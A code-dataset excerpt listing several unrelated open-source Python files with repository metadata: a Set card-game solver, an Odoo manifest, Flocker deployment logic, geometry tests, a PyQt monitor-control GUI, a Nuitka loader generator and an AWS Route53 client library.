| false
| 3.532283
| false
| false
| false
|
bruckhaus/challenges
|
python_challenges/set_game.py
|
1
|
3414
|
import pprint as pp
import random
class SetGame:
interactive_mode = False
NUM_CARDS_IN_DECK = 81
NUM_CARDS_IN_HAND = 12
NUM_ATTRIBUTES = 4
COUNTS = [1, 2, 3]
FILLS = ['empty', 'striped', 'full']
COLORS = ['red', 'green', 'blue']
SHAPES = ['diamond', 'squiggly', 'oval']
deck = []
hand = []
triplet = None
def __init__(self):
self.triplet = [0, 0, 0]
def play(self):
self.make_deck()
self.deal_hand()
self.check_hand()
def make_deck(self):
self.deck = []
for count in self.COUNTS:
for fill in self.FILLS:
for color in self.COLORS:
for shape in self.SHAPES:
card = [count, fill, color, shape]
self.deck.append(card)
if self.interactive_mode:
print "\nDeck:"
pp.pprint(self.deck)
return self.deck
def deal_hand(self):
for i in range(self.NUM_CARDS_IN_HAND):
r = random.randint(0, self.NUM_CARDS_IN_DECK - 1 - i)
card = self.deck[r]
self.hand.append(card)
self.deck.remove(card)
if self.interactive_mode:
print "\nHand:"
pp.pprint(self.hand)
return self.hand
def check_hand(self):
matches = []
if self.interactive_mode:
print "\nMatches:"
self.next_valid_triplet()
while self.triplet:
if self.check_match():
matches.append(self.triplet[:])
if self.interactive_mode:
self.show_triplet()
self.next_valid_triplet()
return matches
def check_match(self):
for p in range(self.NUM_ATTRIBUTES):
if not (self.all_same(p) or self.all_different(p)):
return False
return True
def all_same(self, p):
t = self.triplet
t1 = self.hand[t[0]]
t2 = self.hand[t[1]]
t3 = self.hand[t[2]]
return t1[p] == t2[p] and t2[p] == t3[p]
def all_different(self, p):
t = self.triplet
t1 = self.hand[t[0]]
t2 = self.hand[t[1]]
t3 = self.hand[t[2]]
return t1[p] != t2[p] and t2[p] != t3[p] and t1[p] != t3[p]
def show_triplet(self):
print " ", self.triplet
print " ", self.hand[self.triplet[0]]
print " ", self.hand[self.triplet[1]]
print " ", self.hand[self.triplet[2]]
def next_valid_triplet(self):
while True:
self.next_triplet()
if (not self.triplet) or self.is_triplet_valid():
break
def next_triplet(self):
for p in reversed(range(3)):
if self.triplet[p] < self.NUM_CARDS_IN_HAND - 1:
self.triplet[p] += 1
return
else:
self.triplet[p] = 0
self.triplet = None
def is_triplet_valid(self):
t = self.triplet
# can't choose same card twice:
if t[0] == t[1] or t[1] == t[2]:
return False
# order of cards is not significant: allow only smallest sort order of each combination and reject others:
if t[0] > t[1] or t[1] > t[2]:
return False
return True
if __name__ == '__main__':
game = SetGame()
game.interactive_mode = True
game.play()
|
mit
| 5,268,973,161,389,575,000
| 27.940678
| 114
| 0.503222
| false
| 3.451972
| false
| false
| false
|
odoousers2014/odoo_addons-2
|
clv_place/__openerp__.py
|
1
|
2321
|
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
{
'name': 'Place',
'version': '1.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'category': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://clvsol.com',
'description': '''
Place
=====
''',
'depends': [
'clv_base',
'clv_tag',
'clv_annotation',
],
'data': [
'security/clv_place_security.xml',
'security/ir.model.access.csv',
'clv_place_view.xml',
'category/clv_place_category_view.xml',
'clv_tag/clv_tag_view.xml',
'clv_annotation/clv_annotation_view.xml',
'seq/clv_place_seq_view.xml',
'seq/clv_place_sequence.xml',
'seq/clv_place_category_sequence.xml',
'wkf/clv_place_workflow.xml',
'wkf/clv_place_wkf_view.xml',
'history/clv_place_history_view.xml',
],
'test': [],
'installable': True,
'active': False,
}
|
agpl-3.0
| -8,132,136,832,875,332,000
| 42.792453
| 80
| 0.453253
| false
| 4.346442
| false
| false
| false
|
beni55/flocker
|
flocker/node/_deploy.py
|
1
|
18591
|
# Copyright Hybrid Logic Ltd. See LICENSE file for details.
# -*- test-case-name: flocker.node.test.test_deploy -*-
"""
Deploy applications on nodes.
"""
from zope.interface import Interface, implementer
from characteristic import attributes
from twisted.internet.defer import gatherResults, fail, DeferredList, succeed
from twisted.python.filepath import FilePath
from .gear import GearClient, PortMap, GearEnvironment
from ._model import (
Application, VolumeChanges, AttachedVolume, VolumeHandoff,
)
from ..route import make_host_network, Proxy
from ..volume._ipc import RemoteVolumeManager
from ..common._ipc import ProcessNode
# Path to SSH private key available on nodes and used to communicate
# across nodes.
# XXX duplicate of same information in flocker.cli:
# https://github.com/ClusterHQ/flocker/issues/390
SSH_PRIVATE_KEY_PATH = FilePath(b"/etc/flocker/id_rsa_flocker")
@attributes(["running", "not_running"])
class NodeState(object):
"""
The current state of a node.
:ivar running: A ``list`` of ``Application`` instances on this node
that are currently running or starting up.
:ivar not_running: A ``list`` of ``Application`` instances on this
node that are currently shutting down or stopped.
"""
class IStateChange(Interface):
"""
An operation that changes the state of the local node.
"""
def run(deployer):
"""
Run the change.
:param Deployer deployer: The ``Deployer`` to use.
:return: ``Deferred`` firing when the change is done.
"""
def __eq__(other):
"""
Return whether this change is equivalent to another.
"""
def __ne__(other):
"""
Return whether this change is not equivalent to another.
"""
@implementer(IStateChange)
@attributes(["changes"])
class Sequentially(object):
"""
Run a series of changes in sequence, one after the other.
Failures in earlier changes stop later changes.
"""
def run(self, deployer):
d = succeed(None)
for change in self.changes:
d.addCallback(lambda _, change=change: change.run(deployer))
return d
@implementer(IStateChange)
@attributes(["changes"])
class InParallel(object):
"""
Run a series of changes in parallel.
Failures in one change do not prevent other changes from continuing.
"""
def run(self, deployer):
return gatherResults((change.run(deployer) for change in self.changes),
consumeErrors=True)
@implementer(IStateChange)
@attributes(["application"])
class StartApplication(object):
"""
Launch the supplied application as a gear unit.
:ivar Application application: The ``Application`` to create and
start.
"""
def run(self, deployer):
application = self.application
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
d = volume.expose_to_docker(application.volume.mountpoint)
else:
d = succeed(None)
if application.ports is not None:
port_maps = map(lambda p: PortMap(internal_port=p.internal_port,
external_port=p.external_port),
application.ports)
else:
port_maps = []
if application.environment is not None:
environment = GearEnvironment(
id=application.name,
variables=application.environment)
else:
environment = None
d.addCallback(lambda _: deployer.gear_client.add(
application.name,
application.image.full_name,
ports=port_maps,
environment=environment
))
return d
@implementer(IStateChange)
@attributes(["application"])
class StopApplication(object):
"""
Stop and disable the given application.
:ivar Application application: The ``Application`` to stop.
"""
def run(self, deployer):
application = self.application
unit_name = application.name
result = deployer.gear_client.remove(unit_name)
def unit_removed(_):
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
return volume.remove_from_docker()
result.addCallback(unit_removed)
return result
@implementer(IStateChange)
@attributes(["volume"])
class CreateVolume(object):
"""
Create a new locally-owned volume.
:ivar AttachedVolume volume: Volume to create.
"""
def run(self, deployer):
return deployer.volume_service.create(self.volume.name)
@implementer(IStateChange)
@attributes(["volume"])
class WaitForVolume(object):
"""
Wait for a volume to exist and be owned locally.
:ivar AttachedVolume volume: Volume to wait for.
"""
def run(self, deployer):
return deployer.volume_service.wait_for_volume(self.volume.name)
@implementer(IStateChange)
@attributes(["volume", "hostname"])
class HandoffVolume(object):
"""
A volume handoff that needs to be performed from this node to another
node.
See :cls:`flocker.volume.VolumeService.handoff` for more details.
:ivar AttachedVolume volume: The volume to hand off.
:ivar bytes hostname: The hostname of the node to which the volume is
meant to be handed off.
"""
def run(self, deployer):
service = deployer.volume_service
destination = ProcessNode.using_ssh(
self.hostname, 22, b"root",
SSH_PRIVATE_KEY_PATH)
return service.handoff(service.get(self.volume.name),
RemoteVolumeManager(destination))
@implementer(IStateChange)
@attributes(["ports"])
class SetProxies(object):
"""
Set the ports which will be forwarded to other nodes.
:ivar ports: A collection of ``Port`` objects.
"""
def run(self, deployer):
results = []
# XXX: Errors in these operations should be logged. See
# https://github.com/ClusterHQ/flocker/issues/296
# XXX: The proxy manipulation operations are blocking. Convert to a
# non-blocking API. See https://github.com/ClusterHQ/flocker/issues/320
for proxy in deployer.network.enumerate_proxies():
try:
deployer.network.delete_proxy(proxy)
except:
results.append(fail())
for proxy in self.ports:
try:
deployer.network.create_proxy_to(proxy.ip, proxy.port)
except:
results.append(fail())
return DeferredList(results, fireOnOneErrback=True, consumeErrors=True)
class Deployer(object):
"""
Start and stop applications.
:ivar VolumeService volume_service: The volume manager for this node.
:ivar IGearClient gear_client: The gear client API to use in
deployment operations. Default ``GearClient``.
:ivar INetwork network: The network routing API to use in
deployment operations. Default is iptables-based implementation.
"""
def __init__(self, volume_service, gear_client=None, network=None):
if gear_client is None:
gear_client = GearClient(hostname=u'127.0.0.1')
self.gear_client = gear_client
if network is None:
network = make_host_network()
self.network = network
self.volume_service = volume_service
def discover_node_configuration(self):
"""
List all the ``Application``\ s running on this node.
:returns: A ``Deferred`` which fires with a ``NodeState``
instance.
"""
volumes = self.volume_service.enumerate()
volumes.addCallback(lambda volumes: set(
volume.name for volume in volumes
if volume.uuid == self.volume_service.uuid))
d = gatherResults([self.gear_client.list(), volumes])
def applications_from_units(result):
units, available_volumes = result
running = []
not_running = []
for unit in units:
# XXX: The container_image will be available on the
# Unit when
# https://github.com/ClusterHQ/flocker/issues/207 is
# resolved.
if unit.name in available_volumes:
# XXX Mountpoint is not available, see
# https://github.com/ClusterHQ/flocker/issues/289
volume = AttachedVolume(name=unit.name, mountpoint=None)
else:
volume = None
application = Application(name=unit.name,
volume=volume)
if unit.activation_state in (u"active", u"activating"):
running.append(application)
else:
not_running.append(application)
return NodeState(running=running, not_running=not_running)
d.addCallback(applications_from_units)
return d
def calculate_necessary_state_changes(self, desired_state,
current_cluster_state, hostname):
"""
Work out which changes need to happen to the local state to match
the given desired state.
Currently this involves the following phases:
1. Change proxies to point to new addresses (should really be
last, see https://github.com/ClusterHQ/flocker/issues/380)
2. Stop all relevant containers.
3. Handoff volumes.
4. Wait for volumes.
5. Create volumes.
6. Start and restart any relevant containers.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes. While technically this also includes the current
node's state, this information may be out of date so we check
again to ensure we have absolute latest information.
:param unicode hostname: The hostname of the node that this is running
on.
:return: A ``Deferred`` which fires with a ``IStateChange``
provider.
"""
phases = []
desired_proxies = set()
desired_node_applications = []
for node in desired_state.nodes:
if node.hostname == hostname:
desired_node_applications = node.applications
else:
for application in node.applications:
for port in application.ports:
# XXX: also need to do DNS resolution. See
# https://github.com/ClusterHQ/flocker/issues/322
desired_proxies.add(Proxy(ip=node.hostname,
port=port.external_port))
if desired_proxies != set(self.network.enumerate_proxies()):
phases.append(SetProxies(ports=desired_proxies))
d = self.discover_node_configuration()
def find_differences(current_node_state):
current_node_applications = current_node_state.running
all_applications = (current_node_state.running +
current_node_state.not_running)
# Compare the applications being changed by name only. Other
# configuration changes aren't important at this point.
current_state = {app.name for app in current_node_applications}
desired_local_state = {app.name for app in
desired_node_applications}
not_running = {app.name for app in current_node_state.not_running}
# Don't start applications that exist on this node but aren't
# running; instead they should be restarted:
start_names = desired_local_state.difference(
current_state | not_running)
stop_names = {app.name for app in all_applications}.difference(
desired_local_state)
start_containers = [
StartApplication(application=app)
for app in desired_node_applications
if app.name in start_names
]
stop_containers = [
StopApplication(application=app) for app in all_applications
if app.name in stop_names
]
restart_containers = [
Sequentially(changes=[StopApplication(application=app),
StartApplication(application=app)])
for app in desired_node_applications
if app.name in not_running
]
# Find any applications with volumes that are moving to or from
# this node - or that are being newly created by this new
# configuration.
volumes = find_volume_changes(hostname, current_cluster_state,
desired_state)
if stop_containers:
phases.append(InParallel(changes=stop_containers))
if volumes.going:
phases.append(InParallel(changes=[
HandoffVolume(volume=handoff.volume,
hostname=handoff.hostname)
for handoff in volumes.going]))
if volumes.coming:
phases.append(InParallel(changes=[
WaitForVolume(volume=volume)
for volume in volumes.coming]))
if volumes.creating:
phases.append(InParallel(changes=[
CreateVolume(volume=volume)
for volume in volumes.creating]))
start_restart = start_containers + restart_containers
if start_restart:
phases.append(InParallel(changes=start_restart))
d.addCallback(find_differences)
d.addCallback(lambda _: Sequentially(changes=phases))
return d
def change_node_state(self, desired_state,
current_cluster_state,
hostname):
"""
Change the local state to match the given desired state.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes.
:param unicode hostname: The hostname of the node that this is running
on.
:return: ``Deferred`` that fires when the necessary changes are done.
"""
d = self.calculate_necessary_state_changes(
desired_state=desired_state,
current_cluster_state=current_cluster_state,
hostname=hostname)
d.addCallback(lambda change: change.run(self))
return d
def find_volume_changes(hostname, current_state, desired_state):
"""
Find what actions need to be taken to deal with changes in volume
location between current state and desired state of the cluster.
XXX The logic here assumes the mountpoints have not changed,
and will act unexpectedly if that is the case. See
https://github.com/ClusterHQ/flocker/issues/351 for more details.
XXX The logic here assumes volumes are never added or removed to
existing applications, merely moved across nodes. As a result test
coverage for those situations is not implemented. See
https://github.com/ClusterHQ/flocker/issues/352 for more details.
XXX Comparison is done via volume name, rather than AttachedVolume
objects, until https://github.com/ClusterHQ/flocker/issues/289 is fixed.
:param unicode hostname: The name of the node for which to find changes.
:param Deployment current_state: The old state of the cluster on which the
changes are based.
:param Deployment desired_state: The new state of the cluster towards which
the changes are working.
"""
desired_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in desired_state.nodes}
current_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in current_state.nodes}
local_desired_volumes = desired_volumes.get(hostname, set())
local_desired_volume_names = set(volume.name for volume in
local_desired_volumes)
local_current_volume_names = set(volume.name for volume in
current_volumes.get(hostname, set()))
remote_current_volume_names = set()
for volume_hostname, current in current_volumes.items():
if volume_hostname != hostname:
remote_current_volume_names |= set(
volume.name for volume in current)
# Look at each application volume that is going to be running
# elsewhere and is currently running here, and add a VolumeHandoff for
# it to `going`.
going = set()
for volume_hostname, desired in desired_volumes.items():
if volume_hostname != hostname:
for volume in desired:
if volume.name in local_current_volume_names:
going.add(VolumeHandoff(volume=volume,
hostname=volume_hostname))
# Look at each application volume that is going to be started on this
# node. If it was running somewhere else, we want that Volume to be
# in `coming`.
coming_names = local_desired_volume_names.intersection(
remote_current_volume_names)
coming = set(volume for volume in local_desired_volumes
if volume.name in coming_names)
# For each application volume that is going to be started on this node
# that was not running anywhere previously, make sure that Volume is
# in `creating`.
creating_names = local_desired_volume_names.difference(
local_current_volume_names | remote_current_volume_names)
creating = set(volume for volume in local_desired_volumes
if volume.name in creating_names)
return VolumeChanges(going=going, coming=coming, creating=creating)
|
apache-2.0
| 2,322,558,771,706,020,000
| 36.709939
| 79
| 0.612232
| false
| 4.666416
| true
| false
| false
|
superbob/YunoSeeMe
|
test_geometry.py
|
1
|
1158
|
"""
Tests for the geometry module
"""
import geometry
EPSILON = 0.001
EPSILON_L = 0.0000001
EPSILON_H = 0.1
def test_half_central_angle():
expected = 0.0016830423969495
actual = geometry.half_central_angle(0.76029552909832, 0.0252164472196439, 0.76220881138424, 0.0213910869250003)
assert abs(expected - actual) <= EPSILON_L
def test_central_angle():
expected = 0.003366084793899
actual = geometry.central_angle(0.76029552909832, 0.0252164472196439, 0.76220881138424, 0.0213910869250003)
assert abs(expected - actual) <= EPSILON_L
def test_quadratic_mean():
expected = 6367453.627
actual = geometry.quadratic_mean(geometry.EQUATORIAL_RADIUS, geometry.POLAR_RADIUS)
assert abs(expected - actual) <= EPSILON_H
def test_distance_between_wgs84_coordinates():
expected = 21433.388831
actual = geometry.distance_between_wgs84_coordinates(43.561725, 1.444796, 43.671348, 1.225619)
assert abs(expected - actual) <= EPSILON
def test_overhead_height():
expected = 2.731679321737121
actual = geometry.overhead_height(0.00092629, geometry.EARTH_RADIUS)
assert abs(expected - actual) <= EPSILON
|
bsd-2-clause
| 2,468,521,084,359,345,000
| 28.692308
| 116
| 0.729706
| false
| 2.939086
| true
| false
| false
|
Informatic/python-ddcci
|
qddccigui.py
|
1
|
3058
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
PyQt4 DDC/CI GUI, python-ddcci example
"""
import sys
import ddcci
import os
from PyQt4 import QtGui, QtCore
from PyKDE4.kdeui import KStatusNotifierItem
script_path = os.path.dirname(os.path.realpath(os.path.abspath(__file__)))
assets_path = os.path.join(script_path, 'assets')
def asset(name):
return os.path.join(assets_path, name)
class QDDCCIGui(QtGui.QWidget):
controls = [{
'tag': 'brightness',
'name': 'Brightness',
'id': 0x10,
}, {
'tag': 'contrast',
'name': 'Constrast',
'id': 0x12,
}]
scroll_control = controls[1]
def __init__(self, busid):
super(QDDCCIGui, self).__init__()
self.device = ddcci.DDCCIDevice(busid)
self.init_ui()
def init_ui(self):
grid = QtGui.QGridLayout()
grid.setSpacing(2)
for i, control in enumerate(self.controls):
icon = QtGui.QLabel(self)
icon.setPixmap(QtGui.QPixmap(asset('%s.png' % control['tag'])))
icon.setToolTip(control['name'])
grid.addWidget(icon, i+1, 0)
label = QtGui.QLabel(self)
label.setMinimumWidth(32)
label.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignRight)
grid.addWidget(label, i+1, 1)
sld = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld.label = label
sld.control = control
value, max_value = self.device.read(control['id'], True)
sld.setMinimum(0)
sld.setMaximum(max_value)
sld.setValue(value)
self.update_label(sld)
sld.setMinimumWidth(150)
sld.setFocusPolicy(QtCore.Qt.NoFocus)
sld.valueChanged[int].connect(self.change_value)
control['slider'] = sld # FIXME circular reference
grid.addWidget(sld, i+1, 2)
self.setLayout(grid)
self.setGeometry(300, 300, 280, 70)
self.setWindowTitle('Qt DDC/CI Gui')
self.show()
if self.scroll_control:
self.tray_icon = KStatusNotifierItem("qddccigui", self)
self.tray_icon.setIconByPixmap(QtGui.QIcon(QtGui.QPixmap(
asset('%s.png' % self.scroll_control['tag']))))
self.tray_icon.scrollRequested[int, QtCore.Qt.Orientation].\
connect(self.scroll_requested)
def change_value(self, value, update=True):
self.update_label(self.sender())
if update:
self.device.write(self.sender().control['id'], value)
def scroll_requested(self, delta, orientation):
new_value = self.scroll_control['slider'].value() + delta/24
self.scroll_control['slider'].setValue(new_value)
def update_label(self, sld):
sld.label.setText('%d%%' % sld.value())
def main():
app = QtGui.QApplication(sys.argv)
argv = app.arguments()
ex = QDDCCIGui(int(argv[1]) if len(argv) > 1 else 8)
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
mit
| 294,655,486,794,354,240
| 27.055046
| 77
| 0.584696
| false
| 3.463194
| false
| false
| false
|
wfxiang08/Nuitka
|
nuitka/codegen/LoaderCodes.py
|
1
|
2878
|
# Copyright 2015, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Code to generate and interact with module loaders.
This is for generating the look-up table for the modules included in a binary
or distribution folder.
"""
from .Indentation import indented
from .templates.CodeTemplatesLoader import (
template_metapath_loader_body,
template_metapath_loader_compiled_module_entry,
template_metapath_loader_compiled_package_entry,
template_metapath_loader_shlib_module_entry
)
def getModuleMetapathLoaderEntryCode(module_name, module_identifier,
is_shlib, is_package):
if is_shlib:
assert module_name != "__main__"
assert not is_package
return template_metapath_loader_shlib_module_entry % {
"module_name" : module_name
}
elif is_package:
return template_metapath_loader_compiled_package_entry % {
"module_name" : module_name,
"module_identifier" : module_identifier,
}
else:
return template_metapath_loader_compiled_module_entry % {
"module_name" : module_name,
"module_identifier" : module_identifier,
}
def getMetapathLoaderBodyCode(other_modules):
metapath_loader_inittab = []
metapath_module_decls = []
for other_module in other_modules:
metapath_loader_inittab.append(
getModuleMetapathLoaderEntryCode(
module_name = other_module.getFullName(),
module_identifier = other_module.getCodeName(),
is_shlib = other_module.isPythonShlibModule(),
is_package = other_module.isPythonPackage()
)
)
if not other_module.isPythonShlibModule():
metapath_module_decls.append(
"MOD_INIT_DECL( %s );" % other_module.getCodeName()
)
return template_metapath_loader_body % {
"use_loader" : 1 if other_modules else 0,
"metapath_module_decls" : indented(metapath_module_decls, 0),
"metapath_loader_inittab" : indented(metapath_loader_inittab)
}
|
apache-2.0
| -997,178,309,059,129,200
| 35.43038
| 78
| 0.64663
| false
| 3.98615
| false
| false
| false
|
jcastillocano/python-route53
|
route53/connection.py
|
1
|
17310
|
from lxml import etree
from route53 import xml_parsers, xml_generators
from route53.exceptions import Route53Error
from route53.transport import RequestsTransport
from route53.xml_parsers.common_change_info import parse_change_info
class Route53Connection(object):
"""
Instances of this class are instantiated by the top-level
:py:func:`route53.connect` function, and serve as a high level gateway
to the Route 53 API. The majority of your interaction with these
instances will probably be creating, deleting, and retrieving
:py:class:`HostedZone <route53.hosted_zone.HostedZone>` instances.
.. warning:: Do not instantiate instances of this class yourself.
"""
endpoint_version = '2012-02-29'
"""The date-based API version. Mostly visible for your reference."""
def __init__(self, aws_access_key_id, aws_secret_access_key, endpoint_version = '2012-02-29', **kwargs):
"""
:param str aws_access_key_id: An account's access key ID.
:param str aws_secret_access_key: An account's secret access key.
"""
self.endpoint_version = endpoint_version
self._endpoint = 'https://route53.amazonaws.com/%s/' % self.endpoint_version
self._xml_namespace = 'https://route53.amazonaws.com/doc/%s/' % self.endpoint_version
self._aws_access_key_id = aws_access_key_id
self._aws_secret_access_key = aws_secret_access_key
if 'transport_class' not in kwargs or kwargs['transport_class'] is None:
self._transport = RequestsTransport(self)
else:
self._transport = kwargs['transport_class'](self)
def _send_request(self, path, data, method):
"""
Uses the HTTP transport to query the Route53 API. Runs the response
through lxml's parser, before we hand it off for further picking
apart by our call-specific parsers.
:param str path: The RESTful path to tack on to the :py:attr:`endpoint`.
:param data: The params to send along with the request.
:type data: Either a dict or bytes, depending on the request type.
:param str method: One of 'GET', 'POST', or 'DELETE'.
:rtype: lxml.etree._Element
:returns: An lxml Element root.
"""
response_body = self._transport.send_request(path, data, method)
root = etree.fromstring(response_body)
return root
def _do_autopaginating_api_call(self, path, params, method, parser_func,
next_marker_xpath, next_marker_param_name,
next_type_xpath=None, parser_kwargs=None):
"""
Given an API method, the arguments passed to it, and a function to
hand parsing off to, loop through the record sets in the API call
until all records have been yielded.
:param str method: The API method on the endpoint.
:param dict params: The kwargs from the top-level API method.
:param callable parser_func: A callable that is used for parsing the
output from the API call.
:param str next_marker_param_name: The XPath to the marker tag that
will determine whether we continue paginating.
:param str next_marker_param_name: The parameter name to manipulate
in the request data to bring up the next page on the next
request loop.
:keyword str next_type_xpath: For the
py:meth:`list_resource_record_sets_by_zone_id` method, there's
an additional paginator token. Specifying this XPath looks for it.
:keyword dict parser_kwargs: Optional dict of additional kwargs to pass
on to the parser function.
:rtype: generator
:returns: Returns a generator that may be returned by the top-level
API method.
"""
if not parser_kwargs:
parser_kwargs = {}
# We loop indefinitely since we have no idea how many "pages" of
# results we're going to have to go through.
while True:
# An lxml Element node.
root = self._send_request(path, params, method)
# Individually yield HostedZone instances after parsing/instantiating.
for record in parser_func(root, connection=self, **parser_kwargs):
yield record
# This will determine at what offset we start the next query.
next_marker = root.find(next_marker_xpath)
if next_marker is None:
# If the NextMarker tag is absent, we know we've hit the
# last page.
break
# if NextMarker is present, we'll adjust our API request params
# and query again for the next page.
params[next_marker_param_name] = next_marker.text
if next_type_xpath:
# This is a _list_resource_record_sets_by_zone_id call. Look
# for the given tag via XPath and adjust our type arg for
# the next request. Without specifying this, we loop
# infinitely.
next_type = root.find(next_type_xpath)
params['type'] = next_type.text
def list_hosted_zones(self, page_chunks=100):
"""
List all hosted zones associated with this connection's account. Since
this method returns a generator, you can pull as many or as few
entries as you'd like, without having to query and receive every
hosted zone you may have.
:keyword int page_chunks: This API call is "paginated" behind-the-scenes
in order to break up large result sets. This number determines
the maximum number of
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances to retrieve per request. The default is fine for almost
everyone.
:rtype: generator
:returns: A generator of :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances.
"""
return self._do_autopaginating_api_call(
path='hostedzone',
params={'maxitems': page_chunks},
method='GET',
parser_func=xml_parsers.list_hosted_zones_parser,
next_marker_xpath="./{*}NextMarker",
next_marker_param_name="marker",
)
def create_hosted_zone(self, name, caller_reference=None, comment=None):
"""
Creates and returns a new hosted zone. Once a hosted zone is created,
its details can't be changed.
:param str name: The name of the hosted zone to create.
:keyword str caller_reference: A unique string that identifies the
request and that allows failed create_hosted_zone requests to be
retried without the risk of executing the operation twice. If no
value is given, we'll generate a Type 4 UUID for you.
:keyword str comment: An optional comment to attach to the zone.
:rtype: tuple
:returns: A tuple in the form of ``(hosted_zone, change_info)``.
The ``hosted_zone`` variable contains a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance matching the newly created zone, and ``change_info``
is a dict with some details about the API request.
"""
body = xml_generators.create_hosted_zone_writer(
connection=self,
name=name,
caller_reference=caller_reference,
comment=comment
)
root = self._send_request(
path='hostedzone',
data=body,
method='POST',
)
return xml_parsers.created_hosted_zone_parser(
root=root,
connection=self
)
def get_hosted_zone_by_id(self, id):
"""
Retrieves a hosted zone, by hosted zone ID (not name).
:param str id: The hosted zone's ID (a short hash string).
:rtype: :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
:returns: An :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance representing the requested hosted zone.
"""
root = self._send_request(
path='hostedzone/%s' % id,
data={},
method='GET',
)
return xml_parsers.get_hosted_zone_by_id_parser(
root=root,
connection=self,
)
def delete_hosted_zone_by_id(self, id):
"""
Deletes a hosted zone, by hosted zone ID (not name).
.. tip:: For most cases, we recommend deleting hosted zones via a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance's
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`
method, but this saves an HTTP request if you already know the zone's ID.
.. note:: Unlike
:py:meth:`HostedZone.delete <route53.hosted_zone.HostedZone.delete>`,
this method has no optional ``force`` kwarg.
:param str id: The hosted zone's ID (a short hash string).
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
root = self._send_request(
path='hostedzone/%s' % id,
data={},
method='DELETE',
)
return xml_parsers.delete_hosted_zone_by_id_parser(
root=root,
connection=self,
)
def _list_resource_record_sets_by_zone_id(self, id, rrset_type=None,
identifier=None, name=None,
page_chunks=100):
"""
Lists a hosted zone's resource record sets by Zone ID, if you
already know it.
.. tip:: For most cases, we recommend going through a
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instance's
:py:meth:`HostedZone.record_sets <route53.hosted_zone.HostedZone.record_sets>`
property, but this saves an HTTP request if you already know the
zone's ID.
:param str id: The ID of the zone whose record sets we're listing.
:keyword str rrset_type: The type of resource record set to begin the
record listing from.
:keyword str identifier: Weighted and latency resource record sets
only: If results were truncated for a given DNS name and type,
the value of SetIdentifier for the next resource record set
that has the current DNS name and type.
:keyword str name: Not really sure what this does.
:keyword int page_chunks: This API call is paginated behind-the-scenes
by this many ResourceRecordSet instances. The default should be
fine for just about everybody, aside from those with tons of RRS.
:rtype: generator
:returns: A generator of ResourceRecordSet instances.
"""
params = {
'name': name,
'type': rrset_type,
'identifier': identifier,
'maxitems': page_chunks,
}
return self._do_autopaginating_api_call(
path='hostedzone/%s/rrset' % id,
params=params,
method='GET',
parser_func=xml_parsers.list_resource_record_sets_by_zone_id_parser,
parser_kwargs={'zone_id': id},
next_marker_xpath="./{*}NextRecordName",
next_marker_param_name="name",
next_type_xpath="./{*}NextRecordType"
)
def _change_resource_record_sets(self, change_set, comment=None):
"""
Given a ChangeSet, POST it to the Route53 API.
.. note:: You probably shouldn't be using this method directly,
as there are convenience methods on the ResourceRecordSet
sub-classes.
:param change_set.ChangeSet change_set: The ChangeSet object to create
the XML doc from.
:keyword str comment: An optional comment to go along with the request.
:rtype: dict
:returns: A dict of change info, which contains some details about
the request.
"""
body = xml_generators.change_resource_record_set_writer(
connection=self,
change_set=change_set,
comment=comment
)
root = self._send_request(
path='hostedzone/%s/rrset' % change_set.hosted_zone_id,
data=body,
method='POST',
)
e_change_info = root.find('./{*}ChangeInfo')
if e_change_info is None:
error = root.find('./{*}Error').find('./{*}Message').text
raise Route53Error(error)
return parse_change_info(e_change_info)
def list_health_checks(self, page_chunks=100):
"""
List all health checks associated with this connection's account. Since
this method returns a generator, you can pull as many or as few
entries as you'd like, without having to query and receive every
hosted zone you may have.
:keyword int page_chunks: This API call is "paginated" behind-the-scenes
in order to break up large result sets. This number determines
the maximum number of
:py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances to retrieve per request. The default is fine for almost
everyone.
:rtype: generator
:returns: A generator of :py:class:`HostedZone <route53.hosted_zone.HostedZone>`
instances.
"""
return self._do_autopaginating_api_call(
path='healthcheck',
params={'maxitems': page_chunks},
method='GET',
parser_func=xml_parsers.list_health_checks_parser,
next_marker_xpath="./{*}NextMarker",
next_marker_param_name="marker",
)
